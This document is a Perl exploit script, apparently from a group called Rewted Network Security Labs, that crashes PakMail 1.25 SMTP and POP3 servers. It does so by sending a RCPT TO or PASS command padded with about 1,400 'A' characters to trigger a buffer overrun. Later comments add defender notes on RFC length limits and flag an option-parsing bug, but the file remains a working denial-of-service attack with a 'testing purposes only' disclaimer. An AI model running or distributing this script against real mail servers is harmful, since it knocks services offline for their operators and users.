#!/usr/bin/perl
 
################################################
# Rewted Network Security Labs www.rewted.org  #
#					       #
# Exploits a buffer overrun on PakMail	       #
# SMTP and POP3 servers.		       #
# Vulnerable version 1.25 and probably below.  #
# Vendor: www.pak.net			       #
#                                	       #
# Exploited by slackee warminx@null.rewted.org #
################################################

use IO::Socket;
use Getopt::Std;
# Command-line handling. Options are parsed into the package-global %args,
# which both subs below read directly.
#
# NOTE(review): the spec 'h:t' gives -h a value but declares -t as a plain
# switch, so Getopt::Std stores 1 in $args{t} whenever -t is present. As
# written, the numeric comparison against 2 therefore does not see a value
# typed after -t, and only the SMTP path is selected.
getopts('h:t', \%args);

# The usage text is shown only when neither option was supplied. If exactly
# one of -h / -t is given, neither this branch nor the dispatch below runs,
# and the script ends silently.
unless (defined($args{h}) || defined($args{t})) {
    print qq~Rewted Network Security Labs www.rewted.org\nUsage:   $0 -h <victim> -t <type>

		-h hostname to test bof
		-t server type to DoS   (1 = SMTP)
					(2 = POP3)

~;
    exit;
}

# Dispatch on the numeric value of -t once both options are present.
if (defined($args{h}) && defined($args{t})) {
    if ($args{t} == 1) {
        pakmail();
    }
    elsif ($args{t} == 2) {
        pakpop();
    }
}

# pakmail: SMTP variant of the test against the host named in $args{h}.
#
# Opens a TCP connection to port 25 and writes two SMTP commands; the
# RCPT TO address carries a local part of 1390 "A" characters. The script
# never reads from the socket, so the final message only means the bytes
# were written, not that the server was affected.
#
# Defender notes: RFC 5321 caps the local part at 64 octets and a command
# line at 512 octets, so an SMTP front end or IDS rule that rejects or
# alerts on over-long RCPT TO arguments covers this request shape. The
# header of this file names PakMail 1.25 as the affected version.
#
# Uses the package globals $victim, $denial and $socket. $denial is
# appended to rather than assigned, so it grows if it already holds data.
sub pakmail {
    $victim = $args{h};
    $denial .= "A" x 1390;

    $socket = IO::Socket::INET->new(
        PeerAddr => $victim,
        PeerPort => "25",
        Proto    => "tcp",
    );
    die "Can't connect.\n" unless $socket;

    # Two separate writes, in the same order as the original.
    print {$socket} "MAIL FROM: test\@localhost\n";
    print {$socket} "RCPT TO: $denial\@localhost\n";

    print "\nSent overflow to $victim\n";
    close($socket);
}

# pakpop: POP3 variant of the test against the host named in $args{h}.
#
# Opens a TCP connection to port 110 and writes a USER command followed by
# a PASS command whose argument is 1400 "A" characters. No reply is read
# from the server, so the final message only confirms the write.
#
# Defender notes: RFC 1939 limits each POP3 command argument to 40
# characters (RFC 2449 raises the whole command line to 255 octets), so a
# PASS argument of this size is far outside protocol limits and can be
# rejected or alerted on before it reaches the mail daemon. The header of
# this file names PakMail 1.25 as the affected version.
#
# Uses the package globals $victim, $denial and $socket. $denial is
# appended to rather than assigned, so it grows if it already holds data.
sub pakpop {
    $victim = $args{h};
    $denial .= "A" x 1400;

    $socket = IO::Socket::INET->new(
        PeerAddr => $victim,
        PeerPort => "110",
        Proto    => "tcp",
    );
    die "Can't connect.\n" unless $socket;

    # Two separate writes, in the same order as the original.
    print {$socket} "user test\n";
    print {$socket} "pass $denial\n";

    print "\nSent overflow to $victim\n";
    close($socket);
}

# Neither I nor Rewted Network Security Labs is liable for usage of this script.
# This is for testing purposes only, use at your own risk.